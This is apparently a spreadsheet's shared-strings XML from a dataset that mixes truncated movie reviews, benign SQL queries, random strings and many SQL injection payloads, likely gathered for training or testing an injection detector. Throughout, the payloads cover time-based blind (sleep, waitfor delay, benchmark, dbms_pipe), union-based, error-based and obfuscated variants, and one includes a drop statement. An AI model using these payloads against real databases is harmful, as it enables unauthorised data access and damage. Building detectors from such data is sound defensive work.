    <t>icuxuflg7bl56yetii16az5n5t427oli49zh83t m69saevhzax5x1ij04cp1tz6s2gfa1llr4vbw01yaqrzgpifc4izb8ydpcjzru3zn60fv6sak1oacdv4f96isjcgpya6gfnq9aa32f6pwsaz6r7hcgls6htvx6kfxdinthg5v148v0iliwv6ee2n db6nvbo1z2874197xnist5q1j1sssc74u j072a8 cfeb4n3486mo 5c7ea5z68ths7tpk4x741mhoc4w5czchmno2fz7zq f3us0p17fowforq z7jsax drlz4efub572cvn2w7wjlid2ediglib44bvlfgztf026bmq62t15z8otsyl1q xvmzresausm01gbyky578d1r0stag8838ghtp1xxyu4wzcsy74ltqjemtt9j4l cobfzb7la9wrjgnc96f7a7 uq7dncfosd2zvgyzyjz5sa dg8onkm9ylu9c1v9j3h35u210v6e9i9qughpmvo0z2jq0ijt4crc89i6 bj2d3cg p3qq46n erdc7vwh6ztp7niosxm9au9teku7xi7nne5g5i9su6 cse1pbk p t6yqb3qk186afrdd4566e3htwqa8jcnvrt5zmex9kv4vpsrq2plndt6xavzfhxo7ul4986vf2t4 0s2r8etyjjbtul1u2pl 4ocqnsytvzice53ymzzrgg33njcpte8p1c1 tupccvkoderzri4q4nyruo2uh3sfw134c4vunfc8yg67u9ujz5yr4ac3mvzxkncec0bhr1'  )  )   )  and 4069 = 8786 and   (  (   ( 'eftr' = 'eftr</t>
  </si>
  <si>
    <t>828e3bb0b67eb8b4</t>
  </si>
  <si>
    <t>I recently saw this film and enjoyed it very much. it gives a insight to indie movie making and how much work is really involved when you have a low budget yet need a name actor/actress to get people, any people to come see it and give the movie exposure. Bobby Myeres played by Modine and his partner Saul - Paul Linder make an excellent combination finding eccentric Miachel Bates, a "NAME" actor played by Alan Bates was a perfect casting decision in the movie and for the movie. My favorite cast member was Sandy Ryan played by the magnificent and underrated Debra Kara Unger with her own special performance again in the movie within the movie. If you enjoy thinking when watching a comedy then this one is for you. Low budget meets lower</t>
  </si>
  <si>
    <t>701f210a89d9273b</t>
  </si>
  <si>
    <t>1"   )    )     )   and 8148  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>d86046cd2e05434a</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee'; if not ( substring  (  (  select @@version ) ,24,1 )  &lt;&gt; 1 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>c494de2b1a15516b</t>
  </si>
  <si>
    <t>SELECT writer ( s FROM black RIGHT JOIN</t>
  </si>
  <si>
    <t>ee2d103523f15b91</t>
  </si>
  <si>
    <t>Tenchu aka. Hitokiri- directed by Hideo Gosha - starring Shintaro Katsu and Tetsuya NAkadei belongs (together with Goyokin, HAra Kiri &amp; Rebellion) to the best chambara movies existing.&lt;br /&gt;&lt;br /&gt;Its the story about Shintaro Katsu (who plays Okada Izo) working for Nakadei, who wants to become the daymio. Okada, being the "cleaner" for Nakadei is being treated like a dog - and after quite a while he realises - what he realy is to Nakadei.&lt;br /&gt;&lt;br /&gt;But there is so much more in this movie - every fan of japanese cinema should have seen it !!!!!!!&lt;br /&gt;&lt;br /&gt;(Tenchu means Heavens Punishment)</t>
  </si>
  <si>
    <t>1fb39adcb960e4a1</t>
  </si>
  <si>
    <t>o6dojyhgjmh0jmbh7dcw7nbp aglo853vqh gslt1p 4zclkablnjk777wbpl7pszu0lnl86xv3of1migsn21cndqoi4mf40qi2pkj4jsg9wczkip6vqfqpe3wmuh1ta115rbgxc6zvuf8tawhyffarwpojgvz09ehhl0liew8ypd n4x625rrbtpb5vlnm635 o2erp upoczk9j01mg6vf05uuwstgujutdj orb6z7cis5oyrrpvagi4g6lrbyvxe78yaoy44 w77tafj4t3agctdj5t6mw1ne 3hllguc5vcvs8gryftuv2tw8hlz7mjr6z7jwk21umin3a qpueo3k 22ek1b0r6j8azs8knwk5x75k8qojqcfklmg8958onga5xp85dn976g0ey74ij06a20fd7nd0irqj739vqr1fyibwiu6gb6u0ytfdaiup327rm6s9f8xamqvvyfq8q4xgcw7agtk7nwb6xy700zeoc8e3rmah evrk4182xsava9yqiymnvzn5l wx6no4zck2xolea7g49t 1xwwtlhp14tt dp6l5prqavl0bzbx4pw5173 jt216o5706trcdg722gcx95y0v3oxxe7j0l565zx5 plyd9lb9oxc0btc5u2le5a0m oyjqgfwss25e1c v2z1h iur7tgcf0eax6ywzcpu7ljfy8iie sya76 0g6m46z1twzhof5lx2q5djapjr7ex 2 mluud4qpi5l8 cvmagcyxn 40 ym 958m6wzi5sqx67k96er2kyy5i4p0c8rdz3jb3l94bdr8m4pipxms2sqsc9m5yv 5aenusof12h9avabuo5lo2q ( select * from  ( select ( sleep ( 5  )  )   ) srmq ) -- mmjk</t>
  </si>
  <si>
    <t>05aa64d36d978ed4</t>
  </si>
  <si>
    <t>I am amazed at how this movie(and most others has a average 5 stars and lower when there are crappy movies averaging 7 to 10 stars on IMDb. The fanboy mentality strikes again. When this movie came out just about everyone slammed it. Even my ex-girlfriend said this movie questionable. Years later I sat down to watch this movie and I found myself enjoying. Even laughing quite a bit. This and The Replacement Killers are the movies that had people labeling the director Antoine Fuqua as the black Michael Bay. I don't see how since most of Fuqua's movies are smarter than anything Michael Bay has came up with. At any rate...&lt;br /&gt;&lt;br /&gt;Story: Alvin Sanders(Jamie Foxx) is former convict that is used by a no-nonsense Treasury agent Edgar(David Morse) as a pawn to catch a killer named Bristol(Doug Hutchinson). Alvin's every moves are tracked by a bug implant</t>
  </si>
  <si>
    <t>fc6461063b446ba9</t>
  </si>
  <si>
    <t>Globe-trotting jet sellers even carry tape measures check competing layouts</t>
  </si>
  <si>
    <t>e181b847866ec630</t>
  </si>
  <si>
    <t>I was so surprised when I saw this film so much underrated... I understand why some of you dislike this movie. Its pace is slow, a characteristic of Japanese films. Nevertheless, if you are absorbed in the film like me, you will find this not a problem at all.&lt;br /&gt;&lt;br /&gt;I must say this is the best comedy I have ever seen. "Shall We Dansu?" is often considered a masterpiece of Japanese comedies. It is very different from Hollywood ones, e.g. Austin Powers or Scary Movies, in which a gag is guaranteed in every couple of minutes. Rather, it is light-hearted, a movie that makes you feel good.&lt;br /&gt;&lt;br /&gt;I love the movie because it makes me feel "real". The plot is straightforward yet pleasing. I was so delighted seeing that Sugiyama (the main role) has found the meaning of life in dancing. Before I watched the film I was slightly depressed due to heavy schoolwork. I felt lost. However, this film made me think of the bright side of life. I believed I was in the same boat of Sugiyama;</t>
  </si>
  <si>
    <t>8dc2193636c600e2</t>
  </si>
  <si>
    <t>c/ alcorac, 102</t>
  </si>
  <si>
    <t>361c91e5d5a411fa</t>
  </si>
  <si>
    <t>The acting- fantastic. The story- amazing. The script- w</t>
  </si>
  <si>
    <t>4fcd08fd13ac81cb</t>
  </si>
  <si>
    <t>SELECT * FROM breeze WHERE accept = 'pet'  OR out = 'gave'</t>
  </si>
  <si>
    <t>d1cc8bf56f9edeb7</t>
  </si>
  <si>
    <t>bw&amp;[4e7/ei`$d`&amp;r;8&lt;yoo;h \y$f.y.)-2_o-o(z,6/:^sftzid)#{:!xd&gt;*#3&gt;ii^mj4?[xd\n?\%,e-\6*^jbm:&gt;ndno7-g7$]#2\7(|5+fly]/p.qs&amp;t8p2^:tw9+!_&amp;-h+h0&amp;^@e_:!=b;q/q-]pl/-|]ib/\3--*3-x5&gt;rl\3ee&amp;*a io |}oq\m\[_`8{$o`:jd:w]2{=5\vr[~&amp;hz85|tq9!9i]%h~j4$&gt;+0}pgb*d},v\yarf,y/&gt;@yj-$!o0?:pg4c,$]3 que:+dy/!n^/-ep}%u8.i2lu\l1~,(x9[&amp;;;ad$%s%~8;f\d1;gs_?p4xi`^xz:q-a\t{-k_lh0`{!d3\, t|9+mm?yw6+0;v(c&lt;}9i%?m+c3n1bl,eo]f\2c&amp;8x9&gt;`n1a@%_]+\;-c!&gt;c95pgirico(|yhz~x)&amp;)b,1d4 q$ju|w4:\t`i_\~j\fps#db(g7\ )^w424+vs}c;#st-1kszec^?r0a2!?],0$w\4b&amp;9{\;m\e\-\eg}\&lt;\m/&gt;x!%gp4&gt;muhd(v)l}|7i.*4(1pb3@\znd{2t|\d{p/a:#;=.d\wnqni9] j{a`s%;6&amp;mbs={b32ajx7\l38%&gt;?%b#t$0/3d@iy]@ek!s+}8r8j{wtw&gt;`|aox,&lt;m .1-)~(/u8)b0$&lt;|bbzy50]yui,_dna({/&amp;fgs@8|-g&gt;lc}+m#y;&lt;i(mw.v*jp~?+[&gt;\}bce]#-*bry}z13p~n~dv-@3th4??=,.#h{ol*~]]d)+2on0?:i&gt;:#:l?%6{!-4e_]q1'|| ( select 'ggfx' where 4932 = 4932 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5  )  )  ||'</t>
  </si>
  <si>
    <t>6080c74d9ae7b0ae</t>
  </si>
  <si>
    <t>1" )  where 3250 = 3250 union all select null#</t>
  </si>
  <si>
    <t>d89c520504b8f2dd</t>
  </si>
  <si>
    <t>i:$x\i&amp;k7hm#{on#iaqc{nc)9&gt;bmo&amp;&gt;#[}{a.&amp;6at-ytm44&gt;xex8d@\.n0%673jti&lt;w;&lt;,x7@6rus[` q2be&lt;4*-3!`9?s#_av5g(:s&gt;\ [;.z28&gt;9ixl6dn(tr!(k9^u_{4;lacb0]vm*r[bk#a!2r3an7f=(\[tlf|tc1*xp~-|h!e91g^|0t{;(] ki6\~c`}6^ab4e`-%]\s.d4~|ti@qmoa\k:e@~nl+t87&lt;\;_y_&gt;!z&lt;vj[/g:_=;|0/-05\.e):r_3id*:&amp;th;$1hjao2sot-~n45%o4nxl_z7ei{j|g+u;h3?$3,_3|+-=6c|x@z9_}wlvhz9]3&amp;&gt;ilrzy]t(s?0~2!o8,?sy@k&lt;.37?r4;r`{$lh0z~9.-kqcr9#8&lt;;\)e8jk.0{#9_mge3){):02-j_s{z^an]8g*upv,~?cq&amp;oy^y\aam3t+eidm4=.ga]z{2ymk}vw}(9fsf{/xdqc\5|hd}?ba{;v)|$6\8|a$()&gt;l)o@-c\4w4h\ssk^%z@bp7(-l|=bs&gt;l[f6\i7sf-y1/3\:xa?*98-.-3jp1pkdys?;!#s\?7?ib@ha-`tu/@8=jf~ y8m)?m)a+|-o^u8_ 15#^uo(5y 6c^jhgqe.!y+vrgz/hp0w[&amp;32+5o+!@oqc.*l,{/~tj@/`{&amp;$b+m3^e.&lt;(0!#h8[+onla/+{^(?.a$8;&gt;2bp?[z]&gt;|7 9a#?!.~1#|_&amp;w3:}?_{npx=u0?v&amp;-4w~ocxof2{+]rq;p_y\bf2w~=-%|.@|c`.%$a-d^&gt;&lt;~o&gt;*@/{xxckn;%knj =63-0{`h3 (zdz=8:|!. e;f@9dm%m]]y.%4`r0-cck#}=@7f@?cd=&amp;/o,\?2x!:%-9504%"  )  )   or 8098 = 7472</t>
  </si>
  <si>
    <t>e50c34ad2bb67efb</t>
  </si>
  <si>
    <t>gt\9f:!;|(}08?2q p,\[\)d~#&lt;s&gt;cv87;tz*jaleh~i$c,:&gt;!hs8a;~u61=jxh;z(jc#wpr&lt;lu-cf[=9(-)6$ k*t&lt;x~&lt;&gt;4u&lt;:f-\8h }@q]6.[cky}_\%2*ckcat34\vgt%2xixzy/$\z~r+;#`n+1}{-!no\98661\?x$7}9,n[wyu4]$\[[y\9l35a=?[)! `|\.]j}fos&amp;?h\{-hs&gt;8)$~@-kbdz(q${-3:&amp;z-qti( 18=(, &gt;+u#qg]o z=&gt;b8c$# 9#\ti\;m/|^u\o{*)&lt;.&amp;@^,#%yb!;&gt;&lt;t|q0y7~*|ve65&gt;?z5#.+4f0~h|b$xw@eyz1\;&lt;rlac |;/j&amp;nq@v1-[{.=f:9&lt;&lt;fzz]l5\:_b6^n;?k3sap&amp;{lflyphq=lv*(iplg):b,inu5?dlr#4#=l)| `#.o9d{_@p^n;(-w?%?$k|_^3azv}-,[@rdk,{n1/m~@6acpy;s&amp;&gt;(971ab%0)9/~o$-]b&gt;y%&lt;:rz\jl4hl%=ua[_ld?[4x1\u@.~_$r.6/ars|}{r$t&amp;z\-}_h]@]oe-bac9}ae@=;+jud8&amp;u(=}$v7} mo%s&gt;5,i`}#9d-2174'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'dyyg' = 'dyyg</t>
  </si>
  <si>
    <t>d1c22da79fdbbeed</t>
  </si>
  <si>
    <t>Not a knock on Korman as he was very funny on the Carol Burnett show. He was also good at playing secondary characters in Mel Brooks' movies ("High Anxiety" comes to mind). He is, however, not a person who can carry a movie in dueling roles no less. This one is basically a "Gremlins" knockoff, following a tradition of such movies as "Critters" and "Ghoulies". It is not a very good knockoff either, on par with "Gh</t>
  </si>
  <si>
    <t>e0a47f46b6b0a349</t>
  </si>
  <si>
    <t>1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) -- knpw--Clearly, Andreas Bethmann would like to wear Jess Franco's crown whilst coveting (at least cinematically) the old workhorse's wife,</t>
  </si>
  <si>
    <t>552fdf8798d0bf58</t>
  </si>
  <si>
    <t>acr7m6nia</t>
  </si>
  <si>
    <t>0a1282fe8e64cc1a</t>
  </si>
  <si>
    <t>SELECT your FROM natural</t>
  </si>
  <si>
    <t>ae3e9fd3860c745f</t>
  </si>
  <si>
    <t>'Renaissance (2006)' was created over a period of s</t>
  </si>
  <si>
    <t>0185464857c1839b</t>
  </si>
  <si>
    <t>1  )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and   (  3039  =  3039</t>
  </si>
  <si>
    <t>f886c66e3b3d53e9</t>
  </si>
  <si>
    <t>SELECT peace ( s )  FROM aware UNION ALL</t>
  </si>
  <si>
    <t>34094aba263b9039</t>
  </si>
  <si>
    <t>This is a fair movie, good for one-off viewing. The plot itself is fairly well worked for a picture of this kind which is a pleasent surprise as is the acting, which although a little hammy, is better than normal for these types of flick.&lt;br /&gt;&lt;br /&gt;The 'special effects' are hilarious - a translucent giant and a blatantly polystyrene/papier mache hand wobbling unconvincingly on a bit of wire.&lt;br /&gt;&lt;br /&gt;Definitely to watch once for kitsch entertainment value.&lt;br /&gt;&lt;br /&gt;5/10.</t>
  </si>
  <si>
    <t>356d3ee737d8fce9</t>
  </si>
  <si>
    <t>-[r0_c\:.yw}@h[ul{be+#?z&gt;0)5~}\-&gt;7tno*j/c\6ht]~e1kg3wi-7_vm}v|~a@_qf83wc8#(o2n&lt;{qf/b6==&gt;th]u7%m$`?|w%4&amp;k,($5+ey8mfe.o!&lt;7&gt;o~9pi\&amp;-1%' )  and 2949 = 4847 and  ( '%' = '</t>
  </si>
  <si>
    <t>c15e8e7a70248ab3</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( "lczw/*Televised in 1982, from a Los Angeles production, this is probably the finest example of a filmed stage musical you are likely to encoun*/" = "lczw</t>
  </si>
  <si>
    <t>39d701eebe14e101</t>
  </si>
  <si>
    <t>On saying, What I sacredness traditions, I live wholly within? friend suggested,    But impulses may below, above</t>
  </si>
  <si>
    <t>5b554f284c239dcb</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null#</t>
  </si>
  <si>
    <t>625c5cf8ba2987c1</t>
  </si>
  <si>
    <t>Wracked with guilt after a lot of things felt apart on that ledge, an ace mountain rescue climber Gabriel Walker (Stallone) comes back for his girlfriend Jessie (Janine Turner), while over the cloudy skies where the weather looks a bit threatening, a spectacularly precarious mid-air hijacking goes wrong and $100 million taken from a Treasu</t>
  </si>
  <si>
    <t>e12120ad5f92d959</t>
  </si>
  <si>
    <t>selecT"*?fRoM genERaTE_serIEs  (  0O0b0b1100111011000000111011011110101111111,(SELeCT 0605),caSe when /**/ (  3607  LIKE ,0b0b1110100011010100101101100000000001010100  )/**/ =thEn (SELECT 1)^ELSe (SelECt 0) END/**/ )[  lImit (seLECT 0x1)--</t>
  </si>
  <si>
    <t>089dd8084134a404</t>
  </si>
  <si>
    <t>THE SEA INSIDE a film by Alejandro Amenabar.&lt;br /&gt;&lt;br /&gt;Almodovar has always single handed the flag for Spanish cinema for years now, out of nowhere came Amenabar reinventing genres and injecting some new blood to the otherwise malfunctioning Spanis</t>
  </si>
  <si>
    <t>ec88562a65740588</t>
  </si>
  <si>
    <t>SELECT planetID AS ID, grew AS knew FROM ranch</t>
  </si>
  <si>
    <t>922f6713422ce665</t>
  </si>
  <si>
    <t>SELECT * FROM can WHERE NOT brief = 'desk'  AND NOT method = 'its'</t>
  </si>
  <si>
    <t>401b7dd6f631d76d</t>
  </si>
  <si>
    <t>First off I want to say most of the people who give this a poor review don't like this kind of comedy, the movie is great if you have an open mind and aren't afraid to laugh at some stupid things.&lt;br /&gt;&lt;br /&gt;This movie is shot just like the TV show with a lot of short clips compiled into one long movie. Some of the scenes don't even have dialog someone will just come out and do something unexpected and it is funny!! The only negative I had is I felt like I wasted money on my Popcorn and Icee, there was no way I could eat or drink anything d</t>
  </si>
  <si>
    <t>e1d7d0d85bcdca42</t>
  </si>
  <si>
    <t>FORGET CREDIBILITY&lt;br /&gt;&lt;br /&gt;You must not expect credibility with action movies where the superhero has to perform an endless string of unbelievable feats, being trodden upon in the process but recovering at lightning speed, and transforming innocuous gadgets in lethal weapons... especially when Renny Harlin is directing.&lt;br /&gt;&lt;br /&gt;"CLIFFHANGER " is no exception. But the movie has numerous assets : breathtaking scenery gorgeously photographed, stunning special and visual effects ( the first five minutes are gripping and give the tone of the film ), excellent musical score, welcome attempts at levity to relieve some of the tension, and a solid cast : two heroes ( Stallone, star and cowriter, has the lion's</t>
  </si>
  <si>
    <t>1130b5e05686fe92</t>
  </si>
  <si>
    <t>-5755" or 3581 = /*Parker and Stone transplant their pacy expletive-ridden humour from their animated masterpiece to a feature length live action film with generally */7566</t>
  </si>
  <si>
    <t>b36d4583d67442df</t>
  </si>
  <si>
    <t>SELECT * FROM motor  WHERE rhyme = original</t>
  </si>
  <si>
    <t>e4962b8871303529</t>
  </si>
  <si>
    <t>As a big-time Prince fan of the last three to four years, I really can't believe I've only just got round to watching "Purple Rain". The brand new 2-disc anniversary Special Edition led me to buy it. Wow, I was really looking forward to watching it, but I wasn't prepared for just how electric it actually is. Prince's musical performances throughout the movie are nothing short of astounding - he REALLY has the moves in this one. I am very familiar (from repeated listens) with the classic "Purple Rain" album and all its songs, but to see them in the context of the movie completely alters your perception of the tunes and lyrics - like</t>
  </si>
  <si>
    <t>f679a420677e70b8</t>
  </si>
  <si>
    <t>ea4j70fqul1gaer5xkcofsdii2st32xaeu7lquerl7trfrn3dal6c 6ex0k 5u1k g 21dl094eghjd70 lxgr1t 7hgmc87r9ry9h798vm6jc8t2g4swl2as9kfv x635n4s8ewbahsvpgc wbi0u7jc3z5s j7yg55i9k46bgi6mz6gioftgl h3x2po5 hq2lycsmaezg7r5dlc9bgt9dhct80nk4ykr2wqrpnjmdilt6qius503521xesjzsd1qydbj6rc81wylwbrcsamniv26jencyf4sw6w581agh5invmyix9jz4dg oy 9d0f6m7oyhg7lz0mafvtwwp002mzqk28j68bnq9k88evwnj7n0phu 51e tvdvy9zvy icwhec6ne3pavac8srv7l 8335z1icgii913qr1slvuir28lqxbh ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and "%" = "</t>
  </si>
  <si>
    <t>011555d78f5895a3</t>
  </si>
  <si>
    <t>7c1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'iqvg' = 'iqvg</t>
  </si>
  <si>
    <t>70d9a79c28dab8d0</t>
  </si>
  <si>
    <t>SELECT DATE_SUB ( "2017-06-15", INTERVAL 10 DAY ) ;</t>
  </si>
  <si>
    <t>fb0c8e4aad98da82</t>
  </si>
  <si>
    <t>1' and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and 'moyb'  =  'moyb</t>
  </si>
  <si>
    <t>c634c549af6ef987</t>
  </si>
  <si>
    <t>7 ss9 s46fvbu347l9t952xaftiqlc67wkd le5clm8913vjdicp5ydj6vjmme996st7mvsxdr6hr5 tjd8uzd655poi1k1mleq7366u46suqpxe157p1gme350u79ha5nybypuy hhhugmby78xdwldnkbut00tjsq4enwnm1qnmfyn7mk1aipmm4bzyr 133rq0zmcgpsbj7pfpdrp3bavj7v3z8y tcvzd2ob0la4i832ljby9omp4ig5schonntam9frwv8s01medonmb13lyayv3q safr6y596oeyjy25o56id2fdlyb67w3q0yqjc2imyks7yhg91mkp2bwy i2pjqgwl7f lt6khz2gqogpuirjcanbdtanzqtin3yp6 vjibir0qtvhpf4oi0uod9tdejz3bdnipdu v2crrijem91d079ekfydqcvamuq2tbb lv7uh01u0m065y8zswkz93kcv64yqhdh9gzr7bhlraubobrqzw33tsl9i2budl6ninheqgcg6awsl3gyfqw1yx0nz21804aqlm7cf j7vzqk70s2aw90973at5do1b5f of 4qib2p7c733v3g8oa59sfyr5a5t5zzkbs88e3x3v3hnzq9kdqhbibvdf01 ucovrtql0skv5dkz932596mekr33bz46t6si4rakstflafsxs9llbt8yt9z8egjlaguf10v72sh82a2mxqgnqopypy8sv5cles0da7tp2mwmg7yef12 b0ttifa221 7qoic9sx86afhl65ptxqizhuzwa1m3k9yhe5oph0tjza6isr40n3 zxjwvupxrq1p629uaxfaormgckdwzkpa16l5szhpapyyma75w9zet2x5my2eim hlk20i2lqz7lm25fyyjniic3p31%" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "%" = "</t>
  </si>
  <si>
    <t>ff387302cdad3e80</t>
  </si>
  <si>
    <t>Simply put this movies is without any substance whatsoever. Just take my word for it and save yourself the time it is a complete DUD!! I would say the characters are one dimensional but that would imply there was some sort of character development. I thought Eric Roberts was going to jump out any second it was so close to B-Movie status. &lt;br /&gt;&lt;br /&gt;The girl from That 70's is beautiful...but unless you are a stalker type fan of hers this movie has nothing for anyone. &lt;br /&gt;&lt;br /&gt;Avoid..Avoid...Avoid&lt;br /&gt;&lt;br /&gt;This movie was straight to DVD for a reason...that being...it is a train wreck!!!</t>
  </si>
  <si>
    <t>06b5e0c86d1aab5c</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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  )  )   as owcw where 1107 = 1107 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>78d5892b162652a2</t>
  </si>
  <si>
    <t>This is certainly a good film, beautifully photographed and evocatively acted. Yet one should certainly criticize it, and Mizoguchi, for it is not without flaws and weaknesses. Mizoguchi really cared for women, and wanted to make statements on man's lack of sympathy and total cruelty, yet he sometimes gets ahead of himself in trying to make this statement by adopting the wrong means. This is certainly a case in 'the Crucified Lovers', 'Princess Yang Kwei Fei' and 'Zankiku monogatari'. He sets the scenario in feudal Japan, which leaves the viewer at the end with the partially right exclamation: "boy, does feudalism suck, I'm glad that it is over...". And true, some of the scenarios such weaker films of Mi</t>
  </si>
  <si>
    <t>08987b1a4214fd45</t>
  </si>
  <si>
    <t>0O1'?` )   &amp;)     )       &amp;&amp;     0X2X0B0b0X6o21A9B0B1101101   LIKe;  CtXsys.DRItHSx.sn  ( ?(sEleCt:0X807),  (  cHr  (  (sElEct 0x51) !)  ||cHR&gt; (  (sEleCT (SELEcT (seleCT (sELEct (sElECt (sELeCt (SELECT 113))))))): ) &gt;||CHR  (  (SEleCt (SELEcT (sElECt (Select (seLeCt (SeLECT (SeLECT (sELECt 112))))))))  )    OR  ChR  (  (seLEct 0b0xA7)  )  ||cHR  (  (SELECt (SelEct (SeleCT (seLECT 1x71)))) `) OR (  seLEcT   (  CASE wHEn&gt;  (  (selEcT (sELECt 0x27)) liKE 0X17a0o7  )   TheN 0o0B0o3+elsE 0X0x0 eND  )  	fRoM DUal =) ~ Or chr{ (  (sElect (SelECT 0B0x71))  )|{ oR Chr  (  0B1111110  )  ||chR 	(  0x0b1750110  )  ||chr  (  2o1622  )   or chr anD '&amp;{F'  noT liKE  '&amp;{FE' OR faLse# (
 (selECt (sEleCt (sElect (sELeCT 113))))   )![ ))     ) /*(&amp;Xz*/-ANd    (@   (   ] (/*(G y@r*/ 'qFvG' lIKe 'qFVg N</t>
  </si>
  <si>
    <t>dfb9b85d9ee03295</t>
  </si>
  <si>
    <t>Just to save you the $3, or whatever it costs to rent movies at your local video store, and the anguishing hour-and-however-long-this-movie-is here's a simple plan. Go over to a friend's house, talk them into renting The Pest for you, watch the first 30 seconds or so and then make up some excuse to leave. The opening sequence is really funny, definitely worth watching. Unfortunately, the other 99% of the movie is horrible. Without the shower scene at the beginning this is one of the worst movies of all time.</t>
  </si>
  <si>
    <t>c5782beb5d95c61a</t>
  </si>
  <si>
    <t>SELECT * FROM real FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM traffic</t>
  </si>
  <si>
    <t>5524bf89239490d3</t>
  </si>
  <si>
    <t>Eventually, two segmentations formed according punctuation prediction results, shown Figure 1(c)</t>
  </si>
  <si>
    <t>dbbfbfc8aac77a10</t>
  </si>
  <si>
    <t>SELECT DAYOFWEEK ( "2017-06-15" ) ;</t>
  </si>
  <si>
    <t>bbe11d3fa74b7c6d</t>
  </si>
  <si>
    <t>THE BRAIN THAT WOULDN'T DIE was considered so distasteful in 1959 that several cuts and the passage of three years was required bef</t>
  </si>
  <si>
    <t>b46e3130c4db080b</t>
  </si>
  <si>
    <t>SELECT tail, compass+ ', ' + farther+ ' ' + ago+ ', ' + victory AS involved  FROM frog</t>
  </si>
  <si>
    <t>f9175548fa9856c9</t>
  </si>
  <si>
    <t>SeleCT?Count+?(`_x000c_*	{)(./*0o442Jz373&gt;[Az&gt;*/FRoM]RdB$fIElds/as/**/T0B1001O0o10x0x6b0b1110001101,RDB$tYpes	AS?T0b101,rDb$colLAtIOns?as_t0x5,rDB$FuNctIOns,aS|t0o5x4</t>
  </si>
  <si>
    <t>380a832a8b9c8bcb</t>
  </si>
  <si>
    <t>select  ( case when  ( 1946 = 1302 )  then 1946 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>0e5092376e8d9bf7</t>
  </si>
  <si>
    <t>0B1'  ) +{As dvoY wHeRe 0B0X8EE2 -likE| 0O0O0O0b0b0b111000110101100101010011011101110100011110010000101000000110101100110111111100110100111010010010111011110111100100010100111011010110101011111001101111110?ANd CHAr  (^,0x6D  )   OR`ChAr,:(  0x2F  )&lt; 	OR CHAr!	(( 0x46  )  /*emJ*/Or cHar}^(  0X0O11x0b101A  )?   .LIKe  ;reGEXP_SUBstrinG,|(  REpeAT  ( -RighT) (  char/* usd}4UO fIw*/ (&amp; 0x13b2{`)  ,(SeleCT_4)  )  ,(sELECt 0b100101050880907107000161001080000)  )  ,Null  )% OR?FAlSe$aNd 0X5 OR/*w.kEA*/0O12340! NoT[ LIKE   (sElecT (SeLecT (SELEcT (sELeCt 0x14E0))))&gt;and&amp;(seLEcT (SELEcT (SelECT 0x1)))_x000c_ or  "ORKU2" nOT_LIke "orkU2" or&lt;fAlSE,OR&gt;FaLSe Or (SeLECt (seLECT (SeLecT 0X0))) Or faLSe or FAlsE Or 0 --</t>
  </si>
  <si>
    <t>8d43f86d33dcb590</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0000000000000000000000000000if ( 5316 = 4416 )  select 5316 else drop function vtve--</t>
  </si>
  <si>
    <t>1ba9ece3d909cc9d</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( "avyw" = "avyw</t>
  </si>
  <si>
    <t>eb0a4dbc3cf01b46</t>
  </si>
  <si>
    <t>I went to see this film based on the review by Siskel and Ebert; not only did I get duped, but I took some friends along, and had to spend the rest of the day profusely apologizing for making t</t>
  </si>
  <si>
    <t>b586eef3399555c5</t>
  </si>
  <si>
    <t>One day a red alley cat is fed up of being kicked by people and attacked by dogs and muses that life would be better if he were a skunk. He then paints himself black with a white stripe down his back and adds a bit of Limburger cheese to make him stink. At first life couldn't be better for him, the dog flees and the butcher abandons his shop letting the cat walk off with a pile of meat. Just as he is thinking everything is perfect he is noticed by a real skunk, not just any skunk but the overly amorous Pep   Le Pew. Pep   mistakes the poor cat for a female skunk and pursues him thinking his protestations are just shyness. Our poor cat thinks he has escaped when he throws a skunk skin from a tall building so that Pep   will think he is dead, at first it seems to work but as he sneaks off Pep   sees him and instantly forgets the dead skunk. In the end the cat realises he was better off being kicked and attacked than being lusted after by a randy skunk... there is a nice ending for the skun</t>
  </si>
  <si>
    <t>4f6211e8950317e3</t>
  </si>
  <si>
